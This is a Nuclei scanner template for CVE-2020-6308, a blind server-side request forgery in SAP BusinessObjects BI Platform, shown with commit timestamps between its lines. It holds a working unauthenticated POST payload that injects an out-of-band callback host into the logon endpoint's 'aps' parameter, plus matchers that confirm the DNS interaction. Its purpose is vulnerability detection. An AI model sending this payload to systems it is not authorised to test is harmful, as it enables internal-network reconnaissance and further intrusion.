nuclei-templates/http/cves/2020/CVE-2020-6308.yaml

52 lines
2.4 KiB
YAML
Raw Normal View History

2021-06-02 06:09:27 +00:00
id: CVE-2020-6308
info:
name: SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery
2021-06-02 06:09:27 +00:00
author: madrobot
severity: medium
2022-10-19 02:13:15 +00:00
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks.
2023-09-06 12:22:36 +00:00
remediation: |
Apply the relevant security patches provided by SAP to mitigate this vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
- https://nvd.nist.gov/vuln/detail/CVE-2020-6308
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
2023-07-11 19:49:27 +00:00
epss-score: 0.00306
epss-percentile: 0.6646
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: sap
product: businessobjects_business_intelligence_platform
tags: cve,cve2020,sap,ssrf,oast,unauth
2021-06-02 06:09:27 +00:00
http:
2022-10-19 02:13:15 +00:00
- raw:
2022-10-28 13:45:54 +00:00
- |
2022-10-19 02:13:15 +00:00
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-06-02 06:09:27 +00:00
2022-10-19 02:13:15 +00:00
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
2021-06-02 06:09:27 +00:00
2022-10-19 02:13:15 +00:00
matchers-condition: and
2021-06-02 06:09:27 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
2022-10-19 02:13:15 +00:00
2022-10-19 17:00:59 +00:00
- type: word
part: location
2022-10-28 13:50:08 +00:00
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"
# digest: 490a00463044022011c719b6f8d80b2f4fd86c6c9f32a111ab7a0faa4296be0cb2072d4a573af1d102206784f6bd53a65ce73cec3807b996db1b3ba3661a7777fef3deae6a4ef3f4012d:922c64590222798bb761d5b6d8e72950